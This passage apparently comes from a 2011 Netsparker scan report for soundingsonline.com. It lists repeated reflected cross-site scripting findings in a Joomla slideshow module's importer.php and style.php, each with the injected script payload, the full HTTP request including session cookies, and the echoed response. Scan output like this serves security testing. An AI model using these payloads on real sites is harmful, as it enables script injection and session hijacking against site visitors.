left: 405px;
top: 214px;
}

.gk_news_image_1_thumb{
margin: '"--></style></script><script>netsparker(0x001D06)</script>px;
border: 1px solid ;
width: 66px;
height: 44px;
float: left;
display:block;
}

.gk_news_image_1_tbo{
width: 276px;
}

.gk_news_image_1_interface_buttons{
position:absolute;
}

ul.gk_news_image_1_tick_buttons{
position: absolute;
list-style-type: none;
top: -22px;
left: 405px;
margin: 0px;
padding: 0px;
}

ul.gk_news_image_1_tick_buttons li{
float: left;
padding: 0px !important;
margin-right: 3px;
}

div.gk_news_image_1_preloader{
position: absolute;
width: 615px;
height: 270px;
background: url('../images/load.gif') no-repeat center center #000;
}
- /modules/mod_gk_news_image_1/js/importer.php

/modules/mod_gk_news_image_1/js/importer.php

http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_..

Parameters

Parameter Type Value
mid GET newsimage1
animation_slide_speed GET 500
animation_interval GET 9000
autoanimation GET 1
animation_slide_type GET 0
animation_text_type GET 0
base_bgcolor GET ffffff
text_block_opacity GET 0
thumbnail_width GET 66
thumbnail_margin GET '"--></style></script><script>alert(0x001D1D)</script>
thumbnail_border GET 1
thumbnail_border_color GET a81c21
thumbnail_border_color_inactive GET ffffff
interface_x GET -20
interface_y GET 0
clickable_slides GET 1

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001D1D)%3C/script%3E&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=7dgk4v45hlcenh15d4tre6ums2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:25:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/javascript



try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
"anim_speed":500,
"anim_interval":9000,
"autoanim":1,
"anim_type":0,
"anim_type_t":0,
"bgcolor":"#ffffff",
"opacity":0,
"thumbnail_width":66,
"thumbnail_margin":'"--></style></script><script>netsparker(0x001D1D)</script>,
"thumbnail_border":1,
"thumbnail_border_color":"#a81c21",
"thumbnail_border_color_inactive":"#ffffff",
"interface_x":-20,
"interface_y":0,
"clickable_slides":1,
"actual_animation":false,
"actual_animation_p":false,
"actual_slide":0
};
- /modules/mod_gk_news_image_1/css/style.php

/modules/mod_gk_news_image_1/css/style.php

http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php?text_block_background=1&tex..

Parameters

Parameter Type Value
text_block_background GET 1
text_block_bgcolor GET ffffff
text_block_width GET 195
text_block_opacity GET 0
text_block_margin GET 405
module_width GET 615
module_height GET 270
thumbnail_bar GET 1
thumbnail_width GET 66
thumbnail_height GET 44
thumbnail_margin GET 5
thumbnail_border GET '"--></style></script><script>alert(0x001D2C)</script>
thumbnail_bar_position GET 1
image_x GET 0
image_y GET 0
slides_count GET 4
tick_x GET 405
tick_y GET -22

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001D2C)%3C/script%3E&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=7dgk4v45hlcenh15d4tre6ums2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:25:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/css



div.gk_news_image_1_wrapper {
overflow: hidden;
border: none;
position: relative;
width: 615px;
height: 270px;
background-color: #;
color: #fff;
}

.gk_news_image_1_slide{
top: 0px;
left: 0px;
position: absolute;
display: block;
}

div.gk_news_image_1_wrapper h2 {
margin-bottom: 15px;
}

div.gk_news_image_1_wrapper h2 a {
font:normal 28px Geneva, Arial, Helvetica, sans-serif;
text-decoration: none;
}

div.gk_news_image_1_text_datas {
display: none;
}

.gk_news_image_1_text_bg {
padding-right: 10px;
padding-left: 10px;
width: 195px;
height: 270px;
position: absolute;
left: 405px;
background-color: #ffffff;
opacity: 0;
}

div.gk_news_image_1_text {
padding: 10px;
overflow: hidden;
width: 185px;
height: 206px;
position: absolute;
left: 405px;
top: 0px;
}

a.gk_news_image_1_prev, a.gk_news_image_1_next, a.gk_news_image_1_play, a.gk_news_image_1_pause {
background: transparent url('../images/buttons.png') no-repeat;
display: block;
float: left;
width: 21px;
height: 21px;
margin-left: 2px;
}

a.gk_news_image_1_prev {
background-position: -21px 0;
}

a.gk_news_image_1_play {
background-position: -42px 0;
}

a.gk_news_image_1_pause {
background-position: -63px 0;
}

a:hover.gk_news_image_1_next {
background-position: 0 100%;
}

a:hover.gk_news_image_1_prev {
background-position: -21px 100%;
}

a:hover.gk_news_image_1_play {
background-position: -42px 100%;
}

a:hover.gk_news_image_1_pause {
background-position: -63px 100%;
}

div.gk_news_image_1_tb_prev, div.gk_news_image_1_tb_next {
background: #FFF;
}

div.gk_news_image_1_tb_prev {
background: transparent url('../images/s_prev.png') no-repeat 0 50%;
float: left;
width: 20px;
height: 54px;
}

div.gk_news_image_1_tb_next {
background: transparent url('../images/s_next.png') no-repeat 100% 50%;
float:left;
width:20px;
height: 54px;
}

div.gk_news_image_1_tb_prev:hover {
background: transparent url('../images/s_prev-h.png') no-repeat 0 50%;
}

div.gk_news_image_1_tb_next:hover {
background: transparent url('../images/s_next-h.png') no-repeat 100% 50%;
}

div.gk_news_image_1_tb {
overflow: hidden;
float: left;
height: 54px;
width: 155px;
}

div.gk_news_image_1_thumbnails {
bottom: 100px;
margin-left: 10px;
width: 195px;
height: 54px;
position: absolute;
left: 405px;
top: 204px;
}

.gk_news_image_1_thumb{
margin: 5px;
border: '"--></style></script><script>netsparker(0x001D2C)</script>px solid ;
width: 66px;
height: 44px;
float: left;
display:block;
}

.gk_news_image_1_tbo{
width: 308px;
}

.gk_news_image_1_interface_buttons{
position:absolute;
}

ul.gk_news_image_1_tick_buttons{
position: absolute;
list-style-type: none;
top: -22px;
left: 405px;
margin: 0px;
padding: 0px;
}

ul.gk_news_image_1_tick_buttons li{
float: left;
padding: 0px !important;
margin-right: 3px;
}

div.gk_news_image_1_preloader{
position: absolute;
width: 615px;
height: 270px;
background: url('../images/load.gif') no-repeat center center #000;
}
- /modules/mod_gk_news_image_1/js/importer.php

/modules/mod_gk_news_image_1/js/importer.php

http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_..

Parameters

Parameter Type Value
mid GET newsimage1
animation_slide_speed GET 500
animation_interval GET 9000
autoanimation GET 1
animation_slide_type GET 0
animation_text_type GET 0
base_bgcolor GET ffffff
text_block_opacity GET 0
thumbnail_width GET 66
thumbnail_margin GET 5
thumbnail_border GET '"--></style></script><script>alert(0x001D36)</script>
thumbnail_border_color GET a81c21
thumbnail_border_color_inactive GET ffffff
interface_x GET -20
interface_y GET 0
clickable_slides GET 1

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001D36)%3C/script%3E&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=7dgk4v45hlcenh15d4tre6ums2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:25:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/javascript



try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
"anim_speed":500,
"anim_interval":9000,
"autoanim":1,
"anim_type":0,
"anim_type_t":0,
"bgcolor":"#ffffff",
"opacity":0,
"thumbnail_width":66,
"thumbnail_margin":5,
"thumbnail_border":'"--></style></script><script>netsparker(0x001D36)</script>,
"thumbnail_border_color":"#a81c21",
"thumbnail_border_color_inactive":"#ffffff",
"interface_x":-20,
"interface_y":0,
"clickable_slides":1,
"actual_animation":false,
"actual_animation_p":false,
"actual_slide":0
};
- /modules/mod_gk_news_image_1/js/importer.php

/modules/mod_gk_news_image_1/js/importer.php

http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_..

Parameters

Parameter Type Value
mid GET newsimage1
animation_slide_speed GET 500
animation_interval GET 9000
autoanimation GET 1
animation_slide_type GET 0
animation_text_type GET 0
base_bgcolor GET ffffff
text_block_opacity GET 0
thumbnail_width GET 66
thumbnail_margin GET 5
thumbnail_border GET 1
thumbnail_border_color GET '"--></style></script><script>alert(0x001D54)</script>
thumbnail_border_color_inactive GET ffffff
interface_x GET -20
interface_y GET 0
clickable_slides GET 1

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001D54)%3C/script%3E&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=7dgk4v45hlcenh15d4tre6ums2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:25:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/javascript



try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
"anim_speed":500,
"anim_interval":9000,
"autoanim":1,
"anim_type":0,
"anim_type_t":0,
"bgcolor":"#ffffff",
"opacity":0,
"thumbnail_width":66,
"thumbnail_margin":5,
"thumbnail_border":1,
"thumbnail_border_color":"#'"--></style></script><script>netsparker(0x001D54)</script>",
"thumbnail_border_color_inactive":"#ffffff",
"interface_x":-20,
"interface_y":0,
"clickable_slides":1,
"actual_animation":false,
"actual_animation_p":false,
"actual_slide":0
};
- /modules/mod_gk_news_image_1/js/importer.php

/modules/mod_gk_news_image_1/js/importer.php

http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_..

Parameters

Parameter Type Value
mid GET newsimage1
animation_slide_speed GET 500
animation_interval GET 9000
autoanimation GET 1
animation_slide_type GET 0
animation_text_type GET 0
base_bgcolor GET ffffff
text_block_opacity GET 0
thumbnail_width GET 66
thumbnail_margin GET 5
thumbnail_border GET 1
thumbnail_border_color GET a81c21
thumbnail_border_color_inactive GET '"--></style></script><script>alert(0x001D70)</script>
interface_x GET -20
interface_y GET 0
clickable_slides GET 1

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001D70)%3C/script%3E&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=7dgk4v45hlcenh15d4tre6ums2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:25:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/javascript



try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
"anim_speed":500,
"anim_interval":9000,
"autoanim":1,
"anim_type":0,
"anim_type_t":0,
"bgcolor":"#ffffff",
"opacity":0,
"thumbnail_width":66,
"thumbnail_margin":5,
"thumbnail_border":1,
"thumbnail_border_color":"#a81c21",
"thumbnail_border_color_inactive":"#'"--></style></script><script>netsparker(0x001D70)</script>",
"interface_x":-20,
"interface_y":0,
"clickable_slides":1,
"actual_animation":false,
"actual_animation_p":false,
"actual_slide":0
};
- /modules/mod_gk_news_image_1/css/style.php

/modules/mod_gk_news_image_1/css/style.php

http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php?text_block_background=1&tex..

Parameters

Parameter Type Value
text_block_background GET 1
text_block_bgcolor GET ffffff
text_block_width GET 195
text_block_opacity GET 0
text_block_margin GET 405
module_width GET 615
module_height GET 270
thumbnail_bar GET 1
thumbnail_width GET 66
thumbnail_height GET 44
thumbnail_margin GET 5
thumbnail_border GET 1
thumbnail_bar_position GET 1
image_x GET '"--></style></script><script>alert(0x001D71)</script>
image_y GET 0
slides_count GET 4
tick_x GET 405
tick_y GET -22

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001D71)%3C/script%3E&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=7dgk4v45hlcenh15d4tre6ums2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:25:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/css



div.gk_news_image_1_wrapper {
overflow: hidden;
border: none;
position: relative;
width: 615px;
height: 270px;
background-color: #;
color: #fff;
}

.gk_news_image_1_slide{
top: 0px;
left: '"--></style></script><script>netsparker(0x001D71)</script>px;
position: absolute;
display: block;
}

div.gk_news_image_1_wrapper h2 {
margin-bottom: 15px;
}

div.gk_news_image_1_wrapper h2 a {
font:normal 28px Geneva, Arial, Helvetica, sans-serif;
text-decoration: none;
}

div.gk_news_image_1_text_datas {
display: none;
}

.gk_news_image_1_text_bg {
padding-right: 10px;
padding-left: 10px;
width: 195px;
height: 270px;
position: absolute;
left: 405px;
background-color: #ffffff;
opacity: 0;
}

div.gk_news_image_1_text {
padding: 10px;
overflow: hidden;
width: 185px;
height: 206px;
position: absolute;
left: 405px;
top: 0px;
}

a.gk_news_image_1_prev, a.gk_news_image_1_next, a.gk_news_image_1_play, a.gk_news_image_1_pause {
background: transparent url('../images/buttons.png') no-repeat;
display: block;
float: left;
width: 21px;
height: 21px;
margin-left: 2px;
}

a.gk_news_image_1_prev {
background-position: -21px 0;
}

a.gk_news_image_1_play {
background-position: -42px 0;
}

a.gk_news_image_1_pause {
background-position: -63px 0;
}

a:hover.gk_news_image_1_next {
background-position: 0 100%;
}

a:hover.gk_news_image_1_prev {
background-position: -21px 100%;
}

a:hover.gk_news_image_1_play {
background-position: -42px 100%;
}

a:hover.gk_news_image_1_pause {
background-position: -63px 100%;
}

div.gk_news_image_1_tb_prev, div.gk_news_image_1_tb_next {
background: #FFF;
}

div.gk_news_image_1_tb_prev {
background: transparent url('../images/s_prev.png') no-repeat 0 50%;
float: left;
width: 20px;
height: 56px;
}

div.gk_news_image_1_tb_next {
background: transparent url('../images/s_next.png') no-repeat 100% 50%;
float:left;
width:20px;
height: 56px;
}

div.gk_news_image_1_tb_prev:hover {
background: transparent url('../images/s_prev-h.png') no-repeat 0 50%;
}

div.gk_news_image_1_tb_next:hover {
background: transparent url('../images/s_next-h.png') no-repeat 100% 50%;
}

div.gk_news_image_1_tb {
overflow: hidden;
float: left;
height: 56px;
width: 155px;
}

div.gk_news_image_1_thumbnails {
bottom: 100px;
margin-left: 10px;
width: 195px;
height: 56px;
position: absolute;
left: 405px;
top: 204px;
}

.gk_news_image_1_thumb{
margin: 5px;
border: 1px solid ;
width: 66px;
height: 44px;
float: left;
display:block;
}

.gk_news_image_1_tbo{
width: 316px;
}

.gk_news_image_1_interface_buttons{
position:absolute;
}

ul.gk_news_image_1_tick_buttons{
position: absolute;
list-style-type: none;
top: -22px;
left: 405px;
margin: 0px;
padding: 0px;
}

ul.gk_news_image_1_tick_buttons li{
float: left;
padding: 0px !important;
margin-right: 3px;
}

div.gk_news_image_1_preloader{
position: absolute;
width: 615px;
height: 270px;
background: url('../images/load.gif') no-repeat center center #000;
}
- /modules/mod_gk_news_image_1/js/importer.php

/modules/mod_gk_news_image_1/js/importer.php

http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_..

Parameters

Parameter Type Value
mid GET newsimage1
animation_slide_speed GET 500
animation_interval GET 9000
autoanimation GET 1
animation_slide_type GET 0
animation_text_type GET 0
base_bgcolor GET ffffff
text_block_opacity GET 0
thumbnail_width GET 66
thumbnail_margin GET 5
thumbnail_border GET 1
thumbnail_border_color GET a81c21
thumbnail_border_color_inactive GET ffffff
interface_x GET '"--></style></script><script>alert(0x001D8B)</script>
interface_y GET 0
clickable_slides GET 1

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001D8B)%3C/script%3E&interface_y=0&clickable_slides=1 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=majqkkfsuboh8ev9cfeblgcbi6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:25:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/javascript



try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
"anim_speed":500,
"anim_interval":9000,
"autoanim":1,
"anim_type":0,
"anim_type_t":0,
"bgcolor":"#ffffff",
"opacity":0,
"thumbnail_width":66,
"thumbnail_margin":5,
"thumbnail_border":1,
"thumbnail_border_color":"#a81c21",
"thumbnail_border_color_inactive":"#ffffff",
"interface_x":'"--></style></script><script>netsparker(0x001D8B)</script>,
"interface_y":0,
"clickable_slides":1,
"actual_animation":false,
"actual_animation_p":false,
"actual_slide":0
};
- /modules/mod_gk_news_image_1/css/style.php

/modules/mod_gk_news_image_1/css/style.php

http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php?text_block_background=1&tex..

Parameters

Parameter Type Value
text_block_background GET 1
text_block_bgcolor GET ffffff
text_block_width GET 195
text_block_opacity GET 0
text_block_margin GET 405
module_width GET 615
module_height GET 270
thumbnail_bar GET 1
thumbnail_width GET 66
thumbnail_height GET 44
thumbnail_margin GET 5
thumbnail_border GET 1
thumbnail_bar_position GET 1
image_x GET 0
image_y GET '"--></style></script><script>alert(0x001D94)</script>
slides_count GET 4
tick_x GET 405
tick_y GET -22

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001D94)%3C/script%3E&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=majqkkfsuboh8ev9cfeblgcbi6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:25:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/css



div.gk_news_image_1_wrapper {
overflow: hidden;
border: none;
position: relative;
width: 615px;
height: 270px;
background-color: #;
color: #fff;
}

.gk_news_image_1_slide{
top: '"--></style></script><script>netsparker(0x001D94)</script>px;
left: 0px;
position: absolute;
display: block;
}

div.gk_news_image_1_wrapper h2 {
margin-bottom: 15px;
}

div.gk_news_image_1_wrapper h2 a {
font:normal 28px Geneva, Arial, Helvetica, sans-serif;
text-decoration: none;
}

div.gk_news_image_1_text_datas {
display: none;
}

.gk_news_image_1_text_bg {
padding-right: 10px;
padding-left: 10px;
width: 195px;
height: 270px;
position: absolute;
left: 405px;
background-color: #ffffff;
opacity: 0;
}

div.gk_news_image_1_text {
padding: 10px;
overflow: hidden;
width: 185px;
height: 206px;
position: absolute;
left: 405px;
top: 0px;
}

a.gk_news_image_1_prev, a.gk_news_image_1_next, a.gk_news_image_1_play, a.gk_news_image_1_pause {
background: transparent url('../images/buttons.png') no-repeat;
display: block;
float: left;
width: 21px;
height: 21px;
margin-left: 2px;
}

a.gk_news_image_1_prev {
background-position: -21px 0;
}

a.gk_news_image_1_play {
background-position: -42px 0;
}

a.gk_news_image_1_pause {
background-position: -63px 0;
}

a:hover.gk_news_image_1_next {
background-position: 0 100%;
}

a:hover.gk_news_image_1_prev {
background-position: -21px 100%;
}

a:hover.gk_news_image_1_play {
background-position: -42px 100%;
}

a:hover.gk_news_image_1_pause {
background-position: -63px 100%;
}

div.gk_news_image_1_tb_prev, div.gk_news_image_1_tb_next {
background: #FFF;
}

div.gk_news_image_1_tb_prev {
background: transparent url('../images/s_prev.png') no-repeat 0 50%;
float: left;
width: 20px;
height: 56px;
}

div.gk_news_image_1_tb_next {
background: transparent url('../images/s_next.png') no-repeat 100% 50%;
float:left;
width:20px;
height: 56px;
}

div.gk_news_image_1_tb_prev:hover {
background: transparent url('../images/s_prev-h.png') no-repeat 0 50%;
}

div.gk_news_image_1_tb_next:hover {
background: transparent url('../images/s_next-h.png') no-repeat 100% 50%;
}

div.gk_news_image_1_tb {
overflow: hidden;
float: left;
height: 56px;
width: 155px;
}

div.gk_news_image_1_thumbnails {
bottom: 100px;
margin-left: 10px;
width: 195px;
height: 56px;
position: absolute;
left: 405px;
top: 204px;
}

.gk_news_image_1_thumb{
margin: 5px;
border: 1px solid ;
width: 66px;
height: 44px;
float: left;
display:block;
}

.gk_news_image_1_tbo{
width: 316px;
}

.gk_news_image_1_interface_buttons{
position:absolute;
}

ul.gk_news_image_1_tick_buttons{
position: absolute;
list-style-type: none;
top: -22px;
left: 405px;
margin: 0px;
padding: 0px;
}

ul.gk_news_image_1_tick_buttons li{
float: left;
padding: 0px !important;
margin-right: 3px;
}

div.gk_news_image_1_preloader{
position: absolute;
width: 615px;
height: 270px;
background: url('../images/load.gif') no-repeat center center #000;
}
- /modules/mod_gk_news_image_1/js/importer.php

/modules/mod_gk_news_image_1/js/importer.php

http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_..

Parameters

Parameter Type Value
mid GET newsimage1
animation_slide_speed GET 500
animation_interval GET 9000
autoanimation GET 1
animation_slide_type GET 0
animation_text_type GET 0
base_bgcolor GET ffffff
text_block_opacity GET 0
thumbnail_width GET 66
thumbnail_margin GET 5
thumbnail_border GET 1
thumbnail_border_color GET a81c21
thumbnail_border_color_inactive GET ffffff
interface_x GET -20
interface_y GET '"--></style></script><script>alert(0x001DAC)</script>
clickable_slides GET 1

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001DAC)%3C/script%3E&clickable_slides=1 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=majqkkfsuboh8ev9cfeblgcbi6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:25:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
